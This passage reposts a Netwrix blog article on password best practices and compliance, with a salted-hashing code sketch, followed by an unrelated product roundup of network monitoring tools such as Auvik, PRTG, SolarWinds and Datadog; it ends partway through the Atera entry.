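print(pwned_count("p@ssw0rd"))  # a breached string returns a large count
```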

Password Security and Compliance

Compliance standards require password security and password management best practices as a means to safeguard data, maintain privacy and prevent unauthorized access. Here are a few of the laws that require password security:

  • HIPAA (Health Insurance Portability and Accountability Act): HIPAA mandates that healthcare organizations implement safeguards to protect electronic protected health information (ePHI), which includes secure password practices.
  • PCI DSS (Payment Card Industry Data Security Standard): PCI DSS requires organizations that handle payment card data on their website to implement strong access controls, including password security, to protect cardholder data.
  • GDPR (General Data Protection Regulation): GDPR requires organizations that store or process the data of EU residents to implement appropriate security measures to protect personal data. Password security is a fundamental aspect of data protection under GDPR.
  • FERPA (Family Educational Rights and Privacy Act): FERPA governs the privacy of student education records. It includes requirements for securing access to these records, which involves password security.

Organizations subject to these compliance standards need to implement robust password policies and password security best practices. Failure to do so can result in steep fines and other penalties.

There are also voluntary frameworks that help organizations establish strong password policies. Two of the most well known are the following:

  • NIST Cybersecurity Framework: The National Institute of Standards and Technology (NIST) provides guidelines and recommendations, including password best practices, to enhance cybersecurity.
  • ISO 27001: ISO 27001 is an international standard for information security management systems (ISMSs). It includes requirements related to password management as part of its broader security framework.

Password Best Practices in Action

Now, let’s put these password security best practices into action with an example:

Suppose your name is John Doe and your birthday is December 10, 1985. Instead of using “JohnDoe121085” as your password (which is easily guessable), follow these good password practices:

  • Create a long, unique (and unguessable) password, such as: “M3an85DJ121!”. Better still, use a fully random string from a password manager, since even this example embeds fragments of the name and birthday.
  • Store it in a trusted password manager.
  • Enable multi-factor authentication whenever available.

10 Password Best Practices

If you are looking to strengthen your security, follow these password best practices:

  • Remove hints or knowledge-based authentication: NIST recommends not using knowledge-based authentication (KBA), such as questions like “What town were you born in?” but instead, using something more secure, like two-factor authentication.
  • Hash and encrypt passwords: Protect passwords with encryption when they are transmitted over networks, and store them as salted one-way hashes rather than in reversible form (see the sketch after this list). This makes them useless to any hacker who manages to steal them.
  • Avoid clear text and reversible forms: Users and applications should never store passwords in clear text or in any form that could easily be transformed into clear text. Ensure your password management routine does not rely on clear text (for example, in an XLS file).
  • Choose unique passwords for different accounts: Don’t use the same, or even variations, of the same passwords for different accounts. Try to come up with unique passwords for different accounts.
  • Use a password manager: It can help select new passwords that meet security requirements, send reminders of upcoming password expiration, and update passwords through a user-friendly interface.
  • Enforce strong password policies: Implement and enforce strong password policies that include minimum length and complexity requirements, along with a password history rule to prevent the reuse of previous passwords.
  • Update passwords when needed: Check your passwords and, if the results indicate exposure, update them to minimize the risk of unauthorized access, especially after data breaches.
  • Monitor for suspicious activity: Continuously monitor your accounts for suspicious activity, including multiple failed login attempts, and implement account lockouts and alerts to mitigate threats.
  • Educate users: Conduct or partake in regular security awareness training to learn about password best practices, phishing threats, and the importance of maintaining strong, unique passwords for each account.
  • Implement password expiration policies: Enforce policies that require password changes under defined circumstances, such as evidence of compromise, to enhance security.
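
As a concrete illustration of the hashing rule above, here is a minimal salted-hash sketch built on PBKDF2 from Python's standard library; the iteration count is an assumed cost factor, not a mandated value:

```python
# Store a salted one-way hash instead of the password itself.
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed cost factor; tune to your hardware

def hash_password(password: str) -> tuple[bytes, bytes]:
    """Return (salt, digest) for storage; the password itself is never kept."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time comparison

salt, digest = hash_password("M3an85DJ121!")
print(verify_password("M3an85DJ121!", salt, digest))  # True
```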

How Netwrix Can Help

Adhering to password best practices is vital to safeguarding sensitive information and preventing unauthorized access.

Netwrix Password Secure provides advanced capabilities for monitoring password policies, detecting and responding to suspicious activity and ensuring compliance with industry regulations. With features such as real-time alerts, comprehensive reporting and a user-friendly interface, it empowers organizations to proactively identify and address password-related risks, enforce strong password policies, and maintain strong security across their IT environment.

Conclusion

In a world where cyber threats are constantly evolving, adhering to password management best practices is essential to safeguard your digital presence. First and foremost, create a strong and unique password for each system or application — remember that using a password manager makes it much easier to adhere to this critical best practice. In addition, implement multifactor authentication whenever possible to thwart any attacker who manages to steal your password. By following the guidelines, you can enjoy a safer online experience and protect your valuable digital assets.

Dirk Schrader

Dirk Schrader is a Resident CISO (EMEA) and VP of Security Research at Netwrix. A 25-year veteran in IT security with certifications as CISSP (ISC²) and CISM (ISACA), he works to advance cyber resilience as a modern approach to tackling cyber threats. Dirk has worked on cybersecurity projects around the globe, starting in technical and support roles at the beginning of his career and then moving into sales, marketing and product management positions at both large multinational corporations and small startups. He has published numerous articles about the need to address change and vulnerability management to achieve cyber resilience.

Source :
https://blog.netwrix.com/2023/11/15/password-best-practices/

The Best Network Monitoring Tools & Software

Marc Wilson UPDATED: October 20, 2023

The realm of network monitoring tools, software, and vendors is huge, to say the least. New software, tools, and utilities are launched almost every year to compete in an ever-changing marketplace of IT monitoring, server monitoring, and system monitoring software.

I’ve test-driven, played with, and implemented dozens of these during my career. This guide rounds up the best ones in an easy-to-read format, highlighting their main strengths and why I think they are in the top class of tools to use in your IT infrastructure and business.

Some of the features I look for are device discovery, uptime/downtime indicators, robust and thorough alerting systems (via email/SMS), and NetFlow and SNMP integration, as well as considerations that matter in any software purchase, such as ease of use and value for money.

The features above were all major points of interest when evaluating software suites for this article, and I’ll try to keep it as updated as possible with new feature sets and improvements as they are released.

Here is our list of the top network monitoring tools:

  1. Auvik – EDITOR’S CHOICE This cloud platform provides modules for LAN monitoring, Wi-Fi monitoring, and SaaS system monitoring. The network monitoring package discovers all devices, maps the network, and then implements automated performance tracking. Get a 14-day free trial.
  2. Paessler PRTG Network Monitor – FREE TRIAL A collection of monitoring tools and many of those are network monitors. Runs on Windows Server. Start a 30-day free trial.
  3. SolarWinds Network Performance Monitor – FREE TRIAL The leading network monitoring system that uses SNMP to check on network device statuses. This monitoring tool includes autodiscovery that compiles an asset inventory and automatically draws up a network topology map. Runs on Windows Server. Start 30-day free trial.
  4. Checkmk – FREE TRIAL This hybrid IT infrastructure monitoring package includes a comprehensive network monitor that provides device status tracking and traffic analysis functions via the integration with ntop. Available as a Linux install package, Docker package, appliance and cloud application available in cloud marketplaces. Get a 30-day free trial.
  5. Datadog Network Monitoring – FREE TRIAL Provides good visibility over each of the components of your network and the connections between them – be it cloud, on-premises or hybrid environment. Troubleshoot infrastructure, apps and DNS issues effortlessly.
  6. ManageEngine OpManager – FREE TRIAL An SNMP-based network monitor that has great network topology layout options, all based on an autodiscovery process. Installs on Windows Server and Linux.
  7. NinjaOne RMM – FREE TRIAL This cloud-based system provides remote monitoring and management for managed service providers covering the systems of their clients.
  8. Site24x7 Network Monitoring – FREE TRIAL A cloud-based monitoring system for networks, servers, and applications. This tool monitors both physical and virtual resources.
  9. Atera – FREE TRIAL A cloud-based package of remote monitoring and management tools that include automated network monitoring and a network mapping utility.
  10. ManageEngine RMM Central – FREE TRIAL A powerful asset and network management package that includes patching, remote access, and automated remediation.

Related Post: Best Bandwidth Monitoring Software and Tools for Network Traffic Usage

The Top Network Monitoring Tools and Software

Below you’ll find an updated list of the latest tools and software for ensuring your network is continuously tracked and monitored so you can maintain the highest uptime possible. Most of them offer free downloads or 15- to 30-day trials to get you started and confirm that they meet your requirements.

What should you look for in network monitoring tools?

We reviewed the market for network monitoring software and analyzed the tools based on the following criteria:

  • An automated service that can perform network monitoring unattended
  • A device discovery routine that automatically creates an asset inventory
  • A network mapping service that shows live statuses of all devices
  • Alerts for when problems arise
  • The ability to communicate with network devices through SNMP
  • A free trial or a demo for a no-cost assessment
  • Value for money in a package that provides monitoring for all network devices at a reasonable price

With these selection criteria in mind, we have defined a shortlist of suitable network monitoring tools for all operating systems.

1. Auvik – FREE TRIAL

Auvik Network Monitoring

Auvik is a SaaS platform that offers a network discovery and mapping system that automates enrollment and then continues to operate in order to spot changes in network infrastructure. This system can centralize and unify the monitoring of multiple sites.

Key Features:

  • A SaaS package that includes processing power and storage space for system logs as well as the monitoring software
  • Centralizes the monitoring of networks on multiple sites
  • Watches over network device statuses
  • Offers two plans: Essential and Performance
  • Network traffic analysis included in the higher plan
  • Monitors virtual LANs as well as physical networks
  • Autodiscovery service
  • Network mapping
  • Alerts for automated monitoring
  • Integrations with third-party complementary systems

Why do we recommend it?

Auvik is a cloud-based network monitoring system. It reaches into your network, identifies all connected devices, and then creates a map. While SolarWinds Network Performance Monitor also performs those tasks, Auvik is a much lighter tool that you don’t have to host yourself and you don’t need deep technical knowledge to watch over a network with this automated system.

Auvik’s network monitoring system is automated, thanks to its system of thresholds. The service includes out-of-the-box thresholds that are placed on most of the metrics that the network monitor tracks. It is also possible to create custom thresholds.

Once the monitoring service is operating, if any of the thresholds are crossed, the system raises an alert. This mechanism allows technicians to get on with other tasks, knowing that the thresholds give them time to avert system performance problems that would be noticeable to users.
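
The threshold mechanism is straightforward to picture. The generic sketch below (with invented metric names and values, not Auvik's API) shows the pattern of out-of-the-box thresholds, custom overrides, and alerts:

```python
# Generic threshold-based alerting pattern, as described above.
DEFAULT_THRESHOLDS = {"cpu_percent": 90.0, "packet_loss_percent": 2.0}

def check(metrics: dict[str, float],
          thresholds: dict[str, float] = DEFAULT_THRESHOLDS) -> list[str]:
    """Return one alert string per metric that crossed its threshold."""
    return [f"ALERT: {name}={value} exceeds {thresholds[name]}"
            for name, value in metrics.items()
            if name in thresholds and value > thresholds[name]]

# Custom thresholds can override the defaults per device or per site.
print(check({"cpu_percent": 97.2, "packet_loss_percent": 0.1}))
```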

The Auvik package also includes network management tools, such as configuration management, which standardizes the settings of network devices and prevents unauthorized changes.

The processing power for Auvik is provided by the service’s cloud servers. However, the system requires collectors to be installed on each monitored site. This software runs on Windows Server and Ubuntu Linux. It is also possible to run the collector on a VM. Wherever the collector is located, the system manager still accesses the service’s console, which is based on the Auvik server, through any standard Web browser.

Who is it recommended for?

Smaller businesses that don’t have a team to support IT would benefit from Auvik. It needs no software maintenance and the system provides automated alerts when issues arise, so your few IT staff can get on with supporting other resources while Auvik looks after the network.

PROS:

  • A specialized network monitoring tool
  • Additional network management utilities
  • Configuration management included
  • A cloud-based service that is accessible from anywhere through any standard Web browser
  • Data collectors for Windows Server and Ubuntu Linux

CONS:

  • The system isn’t expandable with any other Auvik modules

Auvik doesn’t publish its prices, but you can access a 14-day free trial.

EDITOR’S CHOICE

Auvik is our top pick for a network monitoring tool because it is a hosted SaaS package that provides all of your network monitoring needs without you needing to maintain the software. The Auvik platform installs an agent on your site and then sets itself up by scanning the network and identifying all devices. The inventory that this system generates gives you details of all of your equipment and provides a basis for network topology maps. Repeated checks on the network gather performance statistics and if any metric crosses a threshold, the tool will generate an alert.  You can centralize the monitoring of multiple sites with this service.

Download: Get a 14-day FREE Trial

Official Site: https://www.auvik.com/#trial

OS: Cloud-based

2. PRTG Network Monitor from Paessler – FREE TRIAL

PRTG Network Monitor

PRTG Network Monitor software is commonly known for its advanced infrastructure management capabilities. All devices, systems, traffic, and applications in your network can be easily displayed in a hierarchical view that summarizes performance and alerts. PRTG monitors the entire IT infrastructure using technology such as SNMP, WMI, SSH, Flows/Packet Sniffing, HTTP requests, REST APIs, Pings, SQL, and a lot more.

Key Features:

  • Autodiscovery that creates and maintains a device inventory
  • Live network topology maps are available in a range of formats
  • Monitoring for wireless networks as well as LANs
  • Multi-site monitoring capabilities
  • SNMP sensors to gather device health information
  • Ping to check on device availability
  • Optional extra sensors to monitor servers and applications
  • System-wide status overviews and drill-down paths for individual device details
  • A protocol analyzer to identify high-traffic applications
  • A packet sniffer to collect packet headers for analysis
  • Color-coded graphs of live data in the system dashboard
  • Capacity planning support
  • Alerts on device problems, resource shortages, and performance issues
  • Notifications generated from alerts that can be sent out by email or SMS
  • Available for installation on Windows Server or as a hosted cloud service

Why do we recommend it?

Paessler PRTG Network Monitor is a very flexible package. Not only does it monitor networks, but it can also monitor endpoints and applications. The PRTG system will discover and map your network, creating a network inventory, which is the basis for automated monitoring. You put together your ideal monitoring system by choosing which sensors to turn on. You pay for an allowance of sensors.

It is one of the best choices for organizations with low experience in network monitoring software. The user interface is really powerful and very easy to use.

A very particular feature of PRTG is its ability to monitor devices in the data center with a mobile app. A QR code that corresponds to the sensor is printed out and attached to the physical hardware. The mobile app is used to scan the code and a summary of the device is displayed on the mobile screen.

In summary, Paessler PRTG is a flexible package of sensors that you can tailor to your own needs by deciding which monitors to activate. The SNMP-based network performance monitoring routines include an autodiscovery system that generates a network asset inventory and topology maps. You can also activate traffic monitoring features that can communicate with switches through NetFlow, sFlow, J-Flow, and IPFIX. QoS and NBAR features enable you to keep your time-sensitive applications working properly.

Who is it recommended for?

PRTG is available in a Free edition, which is limited to 100 sensors. This is probably enough to support a small network. Mid-sized and large organizations should be interested in paying for larger allowances of sensors. The tool can even monitor multiple sites from one location.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack
  • Each sensor is specifically designed to monitor each application, for example, there are prebuilt sensors whose specific purpose is to capture and monitor VoIP activity
  • Supports a freeware version

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

PRTG has a very flexible pricing plan; to get an idea, visit the official pricing webpage below. It is free to use for up to 100 sensors. Beyond that, you get a 30-day free trial to figure out your network requirements.

Paessler PRTG: Download a 30-day FREE Trial

3. SolarWinds Network Performance Monitor – FREE TRIAL

SolarWinds Network Performance Monitor with Free Trial

SolarWinds Network Performance Monitor is easy to set up and can be ready in no time. The tool automatically discovers network devices and deploys within an hour. Its simple approach to overseeing an entire network makes it one of the easiest-to-use and most intuitive user interfaces available.

Key Features:

  • Automatic Network Discovery and Scanning for Wired and Wifi Computers and Devices
  • Support for Wide Array of OEM Vendors
  • Forecast and Capacity Planning
  • Quickly Pinpoint Issues with Network Performance with NetPath™ Critical Path visualization feature
  • Easy to Use Performance Dashboard to Analyze Critical Data points and paths across your network
  • Robust Alerting System with options for Simple/Complex Triggers
  • Monitor CISCO ASA networks with their New Network Insight™ for CISCO ASA
  • Monitor ACLs, VPNs, and Interfaces on your Cisco ASA
  • Monitor Firewall rules through Firewall Rules Browser
  • Hop by Hop Analysis of Critical Network Paths and Components
  • Automatically Discover Networks and Map them along with Topology Views
  • Manage, Monitor and Analyze Wifi Networks within the Dashboard
  • Create HeatMaps of Wifi Networks to pin-point Wifi Dead Spots
  • Monitor Hardware Health of all Servers, Firewalls, Routers, Switches, Desktops, laptops and more
  • Real-Time Network and Netflow Monitoring for Critical Network Components and Devices

Why do we recommend it?

SolarWinds Network Performance Monitor is the leading network monitoring tool in the world and this is the system that the other monitor providers are chasing. Like many other network monitors, this system uses the Simple Network Management Protocol (SNMP) to gather reports on network devices. The strength of SolarWinds lies in the deep technical knowledge of its support advisors, which many other providers lack.

The product is highly customizable and the interface is easy to manage and change very quickly. You can customize the web-based performance dashboards, charts, and views. You can design a tailored topology for your entire network infrastructure. You can also create customized dependency-aware intelligent alerts and much more.

SolarWinds NPM Application Summary

The software is sold as separate modules based on what you use. SolarWinds Network Performance Monitor pricing starts from $1,995 for a one-time license that includes the first year of maintenance.

SolarWinds NPM has an extensive feature list that makes it one of the best choices for a network monitoring solution.

SolarWinds NPM is able to track the performance of networks autonomously through the use of SNMP procedures, producing alerts when problems arise. Alerts are generated if performance dips and also in response to emergency notifications sent out by device agents. This system means that technicians don’t have to watch the monitoring screen all the time because they know that they will be drawn back to fix problems by an email or SMS notification.

SolarWinds NPM - NetPath Screenshot

Who is it recommended for?

SolarWinds Network Performance Monitor is an extensive network monitoring system and it is probably over-engineered for use by a small business. Mid-sized and large companies would benefit from using this tool.

PROS:

  • Supports auto-discovery that builds network topology maps and inventory lists in real-time based on devices that enter the network
  • Has some of the best alerting features that balance effectiveness with ease of use
  • Supports both SNMP monitoring as well as packet analysis, giving you more control over monitoring than similar tools
  • Uses drag and drop widgets to customize the look and feel of the dashboard
  • Tons of pre-configured templates, reports, and dashboard views

CONS:

  • This is a feature-rich enterprise tool designed for sysadmins; non-technical users may find some features overwhelming

You can start with a 30-day free trial.

SolarWinds NPM: Download a 30-day FREE Trial!

4. Checkmk – FREE TRIAL

Checkmk Uplink Bandwidth Graph

Checkmk is an IT asset monitoring package that has the ability to watch over networks, servers, services, and applications. The network monitoring facilities in this package provide both network device status tracking and network traffic monitoring.

Features of this package include:

  • Device discovery that cycles continuously, spotting new devices and removing retired equipment
  • Creation of a network inventory
  • Registration of switches, routers, firewalls, and other network devices
  • Creation of a network topology map
  • Continuous device status monitoring with SNMP
  • SNMP-based reporting suitable for small businesses
  • Performance thresholds with alerts
  • Wireless network monitoring
  • Protocol analysis
  • Traffic throughput statistics per link
  • Switch port monitoring
  • Gateway transmission speed tracking
  • Network traffic data extracted with ntop
  • Can monitor a multi-vendor environment

Why do we recommend it?

The Checkmk combination of network device monitoring and traffic monitoring in one tool is rare. Most network monitoring service creators split those two functions so that you have to buy two separate packages. The Checkmk system also gives you application and server monitoring along with the network monitoring service.

The Checkmk system is easy to set up, thanks to its autodiscovery mechanism. This is based on SNMP. The program will act as an SNMP Manager, send out a broadcast requesting reports from device agents, and then compile the results into an inventory. The agent is the Checkmk package itself if you choose to install the Linux version or it is embedded on a device if you go for the hardware option. If you choose the Checkmk Cloud SaaS option, that platform will install an agent on one of your computers.

The SNMP Manager constantly re-polls for device reports and the values in these appear in the Checkmk device monitoring screen. The platform also updates its network inventory according to the data sent back by device agents in each request/response round. The dashboard also generates a network topology map from information in the inventory. So, that map updates whenever the inventory changes.

Checkmk Network Topology
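
For a sense of what one SNMP polling round looks like on the wire, here is a minimal sketch using the third-party pysnmp library to fetch a device's sysDescr object; the address and community string are placeholders, and this is not Checkmk's own code:

```python
# One SNMP GET round: ask a device for its system description.
from pysnmp.hlapi import (CommunityData, ContextData, ObjectIdentity,
                          ObjectType, SnmpEngine, UdpTransportTarget, getCmd)

error_indication, error_status, error_index, var_binds = next(getCmd(
    SnmpEngine(),
    CommunityData("public", mpModel=1),       # SNMP v2c, placeholder community
    UdpTransportTarget(("192.0.2.1", 161)),   # placeholder device address
    ContextData(),
    ObjectType(ObjectIdentity("SNMPv2-MIB", "sysDescr", 0)),
))

if error_indication:
    print("poll failed:", error_indication)
else:
    for name, value in var_binds:
        print(f"{name} = {value}")  # e.g. the device's OS and model string
```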

While gathering information through SNMP, the tool also scans the headers of passing packets on the network to compile traffic statistics. Essentially, the tool keeps a packet count, which enables it to quickly calculate a traffic throughput rate. Data can also be segmented per protocol, according to the TCP port number in each header.
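
Per-port traffic accounting from packet headers can be sketched in a few lines with the third-party scapy library (it needs administrative privileges to sniff); this shows the general idea rather than Checkmk's ntop integration:

```python
# Count bytes per TCP destination port from live packet headers.
from collections import Counter

from scapy.all import TCP, sniff

bytes_per_port = Counter()

def tally(pkt):
    if TCP in pkt:
        bytes_per_port[pkt[TCP].dport] += len(pkt)

sniff(prn=tally, store=False, timeout=30)  # sample the wire for 30 seconds
for port, nbytes in bytes_per_port.most_common(5):
    print(f"TCP/{port}: {nbytes} bytes")
```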

Who is it recommended for?

Checkmk has a very wide appeal because of its three editions. Checkmk Raw is free and will appeal to small businesses. This is an adaptation of Nagios Core. The paid version of the system is called Checkmk Enterprise and that is designed for mid-sized and large businesses. Checkmk Cloud is a SaaS option.

PROS:

  • Provides both network device monitoring and traffic tracking
  • Automatically discovers devices and creates a network inventory
  • Free version available
  • Options for on-premises or SaaS delivery
  • Monitors wireless networks as well as LANs
  • Available for installation on Linux or as an appliance

CONS:

  • Provides a lot of screens to look through

Start a 30-day free trial.

Checkmk: Start a 30-day FREE Trial

5. Datadog Network Monitoring – FREE TRIAL

Datadog App Performance

Datadog Network Monitoring supervises the performance of network devices. The service is a cloud-based system that is able to explore a network and detect all connected devices. With the information from this research, the network monitor will create an asset inventory and draw up a network topology map. This procedure means that the system performs its own setup routines.

Features of this package include:

  • Monitors networks anywhere, including remote sites
  • Joins together on-premises and cloud-based resource monitoring
  • Integrates with other Datadog modules, such as log management
  • Offers an overview of all network performance and drill-down details of each device
  • Facilitates troubleshooting by identifying performance dependencies
  • Includes DNS server monitoring
  • Gathers SNMP device reports
  • Blends performance data from many information sources
  • Includes data flow monitoring
  • Offers tag-based packet analysis utilities in the dashboard
  • Integrates protocol analyzers
  • Performance threshold baselining based on machine learning
  • Alerts for warnings over evolving performance issues
  • Packages offer network performance monitoring tools (traffic analysis) or network device monitoring
  • Subscription charges with no startup costs

Why do we recommend it?

Datadog Network Monitoring services are split into two modules that are part of a cloud platform of many system monitoring and management tools. These two packages are called Network Performance Monitoring and Network Device Monitoring, which are both subscription services. While the device monitoring package works through SNMP, the performance monitor measures network traffic levels.

The autodiscovery process is ongoing, so it spots any changes you make to your network and instantly updates the inventory and the topology map. The service can also identify virtual systems and extend monitoring of links out to cloud resources.

Datadog Network Monitoring

Datadog Network Monitoring provides end-to-end visibility of all connections, which are also correlated with performance issues highlighted in log messages. The dashboard for the system is resident in the cloud and accessed through any standard browser. This centralizes network performance data from many sources and covers the entire network, link by link and end to end.

You can create custom graphs, metrics, and alerts in an instant, and the software can adjust them dynamically based on different conditions. Datadog pricing starts at free (for up to five hosts), with Pro at $15 per host per month and Enterprise at $23 per host per month.

Who is it recommended for?

The two Datadog network monitoring packages are very easy to sign up for. They work well together to get a complete view of network activities. The pair will discover all of the devices on your network and map them, then startup automated monitoring. These are very easy-to-use systems that are suitable for use by any size of business.

PROS:

  • Has one of the most intuitive interfaces among other network monitoring tools
  • Cloud-based SaaS product allows monitoring with no server deployments or onboarding costs
  • Can monitor both internally and externally giving network admins a holistic view of network performance and accessibility
  • Supports auto-discovery that builds network topology maps on the fly
  • Changes made to the network are reflected in near real-time
  • Allows businesses to scale their monitoring efforts reliably through flexible pricing options

CONS:

  • Would like to see a longer trial period for testing

Start a 14-day free trial.

Datadog: Start a 14-day FREE Trial

6. ManageEngine OpManager – FREE TRIAL

ManageEngine OpManager Linux Network Monitoring

At its core, ManageEngine OpManager is infrastructure management, network monitoring, and application performance management “APM” (with APM plug-in) software.

Key Features:

  • Includes server monitoring as well as network monitoring
  • Autodiscovery function for automatic network inventory assembly
  • Constant checks on device availability
  • A range of network topology map options
  • Automated network mapping
  • Performs an SNMP manager role, constantly polling for device health statuses
  • Receives SNMP Traps and generates alerts when device problems arise
  • Implements performance thresholds and identifies system problems
  • Watches over resource availability
  • Customizable dashboard with color-coded dials and graphs of live data
  • Forwards alerts to individuals by email or SMS
  • Available for Windows Server and Linux
  • Can be enhanced by an application performance monitor to create a full stack supervisory system
  • Free version available
  • Distributed version to supervise multiple sites from one central location

Why do we recommend it?

ManageEngine OpManager is probably the biggest threat to SolarWinds' leading position. This package monitors servers as well as networks, which makes it a great system for monitoring virtualized environments.

When it comes to network management tools, this product is well balanced when it comes to monitoring and analysis features.

The solution can manage your network, servers, network configuration, and fault and performance; it can also analyze your network traffic. ManageEngine OpManager must be installed on-premises.

A highlight of this product is that it comes with pre-configured network monitor device templates. These contain pre-defined monitoring parameters and intervals for specific device types. The Essential edition can be purchased for $595, which allows up to 25 devices.

Who is it recommended for?

A nice feature of OpManager is that it is available for Linux as well as Windows Server for on-premises installation and it can also be used as a service on AWS or Azure for businesses that don’t want to run their own servers. The pricing for this package is very accessible for mid-sized and large businesses. Small enterprises with simple networks should use the Free edition, which is limited to covering a network with three connected devices.

PROS:

  • Designed to work right away, features over 200 customizable widgets to build unique dashboards and reports
  • Leverages autodiscovery to find, inventory, and map new devices
  • Uses intelligent alerting to reduce false positives and eliminate alert fatigue across larger networks
  • Supports email, SMS, and webhook for numerous alerting channels
  • Integrates well in the ManageEngine ecosystem with their other products

CONS:

  • Is a feature-rich tool that will require a time investment to properly learn

Start 30-day free trial.


7. NinjaOne RMM – FREE TRIAL

NinjaOne Endpoint Management

NinjaOne is a remote monitoring and management (RMM) package for managed service providers (MSPs). The system reaches out to each remote network through the installation of an agent on one of its endpoints. The agent acts as an SNMP Manager.

Key Features:

  • Based on the Simple Network Management Protocol
  • SNMP v1, 2, and 3
  • Device discovery and inventory creation
  • Continuous status polling for network devices and endpoints
  • Live traffic data with NetFlow, IPFIX, J-Flow, and sFlow
  • Traffic throughput graphs
  • Customizable detail display
  • Performance graphs
  • Switch port mapper
  • Device availability checks
  • Syslog processing for device status reports
  • Customizable alerts
  • Notifications by SMS or email
  • Related endpoint monitoring and management

Why do we recommend it?

NinjaOne RMM enables each technician to support multiple networks simultaneously. The alerting mechanism in the network monitoring service means that you can assume that everything is working fine on a client’s system unless you receive a notification otherwise. The network tracking service sets itself up automatically with a discovery routine.

The full NinjaOne RMM package provides a full suite of tools for administering a client’s system. The network monitoring service is part of that bundle along with endpoint monitoring and patch management.

The Ninja One system onboards a new client site automatically through a discovery service that creates both hardware and software inventories. The data for each client is kept separate in a subaccount. Technicians that need access to that client’s system for investigation need to be set up with credentials.

The network monitoring system provides both device status tracking and network traffic analysis. The service provides notifications if a device goes offline or throughput drops.

Who is it recommended for?

This service is built with a multi-tenant architecture for use by managed service providers. However, IT departments can also use the system to manage their own networks and endpoints. The service is particularly suitable for simultaneously monitoring multiple sites. The console for the RMM is based in the cloud and accessed through any standard Web browser.

PROS:

  • A cloud-based package that onboards sites through the installation of an agent
  • Auto discovery for network devices and endpoints
  • Network device status monitoring
  • Network traffic analysis
  • Syslog message scanning

CONS:

  • No price list

NinjaOne doesn’t publish a price list so you start your buyer’s journey by accessing a 14-day free trial.


8. Site24x7 Network Monitoring – FREE TRIAL

Site24x7 Network Performance Monitor

Site24x7 is a monitoring service that covers networks, servers, and applications. The network monitoring service in this package starts off by exploring the network for connected devices. It logs its findings in a network inventory and draws up a network topology map.

Key Features:

  • A hosted cloud-based service that includes CPU time and performance data storage space
  • Can unify the monitoring of networks on site all over the world
  • Uses SNMP to check on device health statuses
  • Gives alerts on resource shortages, performance issues, and device problems
  • Generates notifications to forward alerts by email or SMS
  • Root cause analysis features
  • Autodiscovery for a constantly updated network device inventory
  • Automatic network topology mapping
  • Includes internet performance monitoring for utilities such as VPNs
  • Specialized monitoring routines for storage clusters
  • Monitors boundary and edge services, such as load balancers
  • Offers overview and detail screens showing the performance of the entire network and also individual devices
  • Includes network traffic flow monitoring
  • Facilities for capacity planning and bottleneck identification
  • Integrates with application monitoring services to create a full stack service

Why do we recommend it?

Site24x7 Network Monitoring is part of a platform that is very similar to Datadog. A difference lies in the number of modules that Site24x7 offers – it has far fewer than Datadog. Site24x7 bundles its modules into packages with almost all plans providing monitoring for networks, servers, services, applications, and websites. Site24x7 was originally developed to be a SaaS plan for ManageEngine but then was split out into a separate brand, so there is very solid expertise behind this platform.

The Network Monitor uses procedures from the Simple Network Management Protocol (SNMP) to poll devices every minute for status reports. Any changes in the network infrastructure that are revealed by these responses update the inventory and topology map.
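To illustrate the underlying mechanism (not Site24x7's implementation, which is proprietary), here is a minimal SNMP poll using the pysnmp library; the device address and "public" community string are placeholders, and a monitor would simply repeat this request on a fixed interval:

    from pysnmp.hlapi import (
        SnmpEngine, CommunityData, UdpTransportTarget, ContextData,
        ObjectType, ObjectIdentity, getCmd,
    )

    # Poll a device's uptime once via SNMPv2c; failures indicate an unreachable
    # or unhealthy device and would raise an alert in a real monitor.
    error_indication, error_status, _, var_binds = next(getCmd(
        SnmpEngine(),
        CommunityData("public", mpModel=1),                # placeholder community
        UdpTransportTarget(("192.0.2.10", 161), timeout=2, retries=1),
        ContextData(),
        ObjectType(ObjectIdentity("1.3.6.1.2.1.1.3.0")),   # SNMPv2-MIB sysUpTime
    ))
    if error_indication or error_status:
        print("device unreachable or error:", error_indication or error_status)
    else:
        for oid, value in var_binds:
            print(f"{oid} = {value}")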

The results of the device responses are interpreted into live data in the dashboard of the monitor. The dashboard is accessed through any standard browser and its screens can be customized by the user.

The SNMP system empowers device agents to send out a warning without waiting for a request if it detects a problem with the device that it is monitoring. Site24x7 Infrastructure catches these messages, which are called Traps, and generates an alert. This alert can be forwarded to technicians by SMS, email, voice call, or instant messaging post.

The Network Monitor also has a traffic analysis function. This extracts throughput figures from switches and routers and displays data flow information in the system dashboard. This data can also be used for capacity planning.

Who is it recommended for?

The plans for Site24x7 are very reasonably priced, which makes them accessible to businesses of all sizes. Setup for the system is automated and much of the ongoing monitoring processes are carried out without any manual intervention.

PROS:

  • One of the most holistic monitoring tools available, supporting networks, infrastructure, and real user monitoring in a single platform
  • Uses real-time data to discover devices and build charts, network maps, and inventory reports
  • Is one of the most user-friendly network monitoring tools available
  • User monitoring can help bridge the gap between technical issues, user behavior, and business metrics
  • Supports a freeware version for testing

CONS:

  • Is a very detailed platform that will require time to fully learn all of its features and options

Site24x7 costs $9 per month when paid annually. It is available for a free trial.


9. Atera – FREE TRIAL

Atera Screenshot

Atera is a software package built for managed service providers. It is a SaaS platform that includes professional services automation (PSA) and remote monitoring and management (RMM) systems.

Why do we recommend it?

Atera is a package of tools for managed service providers (MSPs). Alongside remote network monitoring capabilities, this package provides automated monitoring services for all IT operations. The package also includes some system management tools, such as a patch manager. Finally, the Atera platform offers Professional Services Automation (PSA) tools to help the managers of MSPs to run their businesses.

The network monitoring system operates remotely through an agent that installs on Windows Server. The agent enables the service to scour the network and identify all of the devices attached to it. This discovery is performed using SNMP, with the agent acting as the SNMP manager.

The SNMP system enables the agent to spot Traps, which warn of device problems. These are sent to the Atera network monitoring dashboard, where they appear as alerts. Atera offers an automated topology mapping service, but this is an add-on to the main subscription packages.

Who is it recommended for?

